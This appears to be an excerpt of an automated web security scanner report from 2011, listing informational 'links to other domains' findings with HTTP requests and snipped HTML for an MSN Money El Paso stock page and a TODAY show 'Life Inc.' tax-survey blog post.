Path:   /investments/stock-price/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investments/stock-price/?Symbol=US:EP HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:41 GMT
Content-Length: 79757
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
,Earnings/Share,Dividend/Share,Current Div. Yield,Market Capitalization,Shares outstanding,El Paso Corp,US:EP,El Paso Corp quote,US:EP quote,El Paso Corp change,US:EP change,El Paso Corp last quote" /><link rel="Shortcut Icon" href="http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="http://investing.money.redacted/sc/css/b0/8f83b90988ff7b93ae75bc90f904a8.css" media="all" />
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a></li><li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
<a href="http://mail.live.com/" class="flytrigger unreadcount">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com/">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a>
...[SNIP]...
<li class="first ">
<a id="hplink" href="http://www.myhomeredacted/">Make MSN your homepage</a>
<a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search">
Web</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li class="flyout noscript"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-03/s-p-500-analyst-recommendation-changes-for-jan-3-table-.html?cmpid=msnmoney">S&amp;P 500 Analyst Recommendation Changes for Jan. 28</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-03/s-p-500-analyst-estimate-revisions-for-jan-3-table-.html?cmpid=msnmoney">S&amp;P 500 Analyst Estimate Revisions for Jan. 28</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-03/s-p-500-analyst-target-price-changes-for-jan-3-table-.html?cmpid=msnmoney">S&amp;P 500 Analyst Target Price Changes for Jan. 28</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-27/u-s-companies-issuing-profit-outlooks-for-jan-27-table-.html?cmpid=msnmoney">U.S. Companies Issuing Profit Outlooks for Jan. 27</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-26/crown-castle-e-trade-netflix-starbucks-u-s-equity-preview.html?cmpid=msnmoney">AT&amp;T, El Paso, Procter &amp; Gamble, Sara Lee: U.S. Equity Movers</a>
...[SNIP]...
<div><a href="http://www.reuters.com/article/marketsNews/idUSN2729479520110127?rpc=77">UPDATE 2-El Paso hedges 2011 energy prices above market</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-26/el-paso-investigates-possible-second-offshore-gas-pipeline-leak.html?cmpid=msnmoney">El Paso Investigates Possible Second Offshore Gas Pipeline Leak</a>
...[SNIP]...
<div class="br br1 brl" >

<script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" >Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" >click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/" >BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" >Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" >Morningstar Inc</a>. Analyst recommendations data provided by <a href="http://www.zacks.com/" >Zacks Investment Research</a>... IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" >Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm" >SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" >Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" >CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a>
<a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj" >Feedback</a>
...[SNIP]...
<li class=" first">
<a href="http://www.bing.com/finance/stockscreener" title="Stock screener on Bing">Stock screener on Bing</a>
...[SNIP]...
<li class="">
<a href="http://money.bundle.com/categories/" title="Message boards on Bundle">Message boards on Bundle</a>
...[SNIP]...
</a>
<a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj" >Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise</a>
...[SNIP]...
<li class="last"><a class="popuplink" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&amp;resize=false">Feedback</a>
...[SNIP]...

22.100. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifeinc.todayshow.com
Path:   /_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001 HTTP/1.1
Host: lifeinc.todayshow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=184
Date: Sat, 29 Jan 2011 23:47:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137460

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Life Inc. - Good Graph Fr
...[SNIP]...
<meta name="contentId" content="5936478" />
<link rel="shortcut icon" href="https://lib.newsvine.com/chrome/today/images/favicon.ico" type="image/x-icon" />
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://lifeinc.todayshow.com/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e2a5a79d215988ddb0f116d757365d6a810c2d2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/d1e431bda25a167e695fb05acc6e0492371d9a89.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/todaymartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/lifeinc/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5936478&amp;rand=1156475061&amp;do=todayshow.com&amp;rf=http%3A%2F%2Flifeinc.todayshow.com%2F_news%2F2011%2F01%2F28%2F5936478-good-graph-friday-what-cheat-on-taxes-never%3Fgt1%3D43001&amp;ad=68:68:279;44::;70:70:276;68:68:279;74:74:278" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i1"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li class="i2"><a href="http://my.redacted/">My MSN</a>
...[SNIP]...
<li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a>
...[SNIP]...
<li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a>
...[SNIP]...
<li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i10"><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li class="i11"><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a>
...[SNIP]...
<li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i15"><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li class="i16"><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li class="i17"><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="i21"><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i1">
               <a href="http://www.msnbc.redacted/" class="site-msnbc">msnbc.com</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i7 show-thelastword"><a href="http://thelastword.msnbc.redacted/">The Last Word</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
</a><a href="http://today.msnbc.redacted/" class="homelink"></a>
...[SNIP]...
<br />Life Inc. is about how the economy is affecting you: your life, your job, your family, your finances, your spending. Check us out on <a href="http://www.facebook.com/pages/Today-Money/152222541478430">Facebook</a> or follow us on <a href="http://twitter.com/todaymoney">Twitter.</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://lifeinc.todayshow.com/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/pages/Today-Money/152222541478430" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5940862" data-contentId="5940862" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:500px;"><img id="allison-linnmsnbc/5940862.jpg" src="http://www.polls.newsvine.com/_vine/images/users/500/allison-linnmsnbc/5940862.jpg" width="500" height="285" alt="" /><div class="photo_credit_container">
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">survey of 1,000 Americans</a>
...[SNIP]...
<p>Update: A reader points out that the study was done by the <a target="_blank" href="http://www.treasury.gov/irsob/">IRS Oversight Board</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/sm-mail.png" alt="Send idea"/></span>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Facebook-icon2.gif" alt="Facebook" width="16" height="16"/></span> <a href="http://www.facebook.com/todaymoney">Follow us on Facebook</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Twitter-icon2.gif" alt="Twitter" width="16" height="16"/></span> <a href="http://twitter.com/todaymoney/">Follow us on Twitter</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/alert.gif" alt="E-mail alerts" width="16" height="16"/></span> <a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">Sign up for e-mail alerts</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="todaymoney" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never" data-Text="Good Graph Friday: What? Cheat on taxes? Never">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://agbroadhurst.newsvine.com/">Arthur G. Broadhurst</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BorsiaII.newsvine.com/">Borsia-II</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://smmfdmh.newsvine.com/">smmfdmh</a>
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">IRS survey of 1,000 Americans</a>
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">IRS survey of 1,000 Americans</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="nbc"><a href="http://allison-linnmsnbc.newsvine.com/">Allison Linn</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://smellyloretta.newsvine.com/">Gregorovich</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://cygnus-x-1.newsvine.com/">Cygnus_X-1</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<p><a href="http://cygnus-x-1.newsvine.com/">Cygnus_X-1</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://peteroid69.newsvine.com/">Peteroid</a>
...[SNIP]...
<div class="normal"><a href="http://IHATETHEGOVT.newsvine.com/">I HATE THE GOVT!!</a>
...[SNIP]...
<div class="normal"><a href="http://BorsiaII.newsvine.com/">Borsia-II</a>
...[SNIP]...
<div class="normal"><a href="http://alice-mc.newsvine.com/">Alice Mc</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Ann1638814.newsvine.com/">Ann-1638814</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://cschick2317.newsvine.com/">cschick2317</a>
...[SNIP]...
<div class="normal"><a href="http://stevenkatz2.newsvine.com/">Steven Katz</a>
...[SNIP]...
<div class="normal"><a href="http://Debi-1314897.newsvine.com/">Debi-1314897</a>
...[SNIP]...
<div class="normal"><a href="http://teapartyfan.newsvine.com/">tea-party-fan</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://rick--ws--nc.newsvine.com/">Rick, WS, NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://trust2112.newsvine.com/">Michael Coats</a>
...[SNIP]...
<div class="normal"><a href="http://DMC2990950.newsvine.com/">DMC-2990950</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://bill-horin.newsvine.com/">Bill Horin</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Becky2120568.newsvine.com/">Becky-2120568</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://knightrider3.newsvine.com/">knightrider-2370569</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star11" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<div class="normal"><a href="http://thesenatehealth.newsvine.com/">keith n</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://sukdu.newsvine.com/">Sue-612917</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://fredevil.newsvine.com/">Fred Evil</a>
...[SNIP]...
<a href="#star12" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<p><a href="http://sukdu.newsvine.com/">Sue-612917</a>
...[SNIP]...
<div class="normal"><a href="http://bday.newsvine.com/">Beth-440386</a>
...[SNIP]...
<div class="normal"><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<a href="#star13" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Takethatback.newsvine.com/">Take that back.</a>
...[SNIP]...
<div class="normal"><a href="http://smoss73.newsvine.com/">Pondering-1159100</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star14" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://guylittle-1.newsvine.com/">GuyLittle</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://fredevil.newsvine.com/">Fred Evil</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star15" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://mjweir.newsvine.com/">mj-1451595</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://stretch291.newsvine.com/">stretch291</a>
...[SNIP]...
<div class="normal"><a href="http://ideaguy2.newsvine.com/">Idea Guy</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star16" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://derek-brockman.newsvine.com/">Derek-908696</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jstoler4156.newsvine.com/">jan-315534</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star17" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://littleadv.newsvine.com/">littleadv</a>
...[SNIP]...
<p><a href="http://bit.ly/gFYrpS">http://bit.ly/gFYrpS</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://cathy15.newsvine.com/">Woodyspond</a>
...[SNIP]...
